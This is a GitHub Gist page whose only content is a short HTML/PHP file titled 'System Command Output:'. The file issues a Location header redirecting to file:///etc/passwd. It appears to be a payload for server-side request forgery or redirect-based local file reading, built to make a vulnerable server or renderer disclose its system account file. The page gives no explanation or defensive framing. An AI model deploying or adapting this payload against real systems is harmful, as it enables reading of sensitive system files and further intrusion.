Skip to content

Instantly share code, notes, and snippets.

@havertz2110
Last active May 21, 2025 07:53
Show Gist options
  • Save havertz2110/7b900c662102a7a881305c50f5da687d to your computer and use it in GitHub Desktop.
Save havertz2110/7b900c662102a7a881305c50f5da687d to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<body>
<h1>System Command Output:</h1>
<?php
header('location:file:///etc/passwd');
?>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment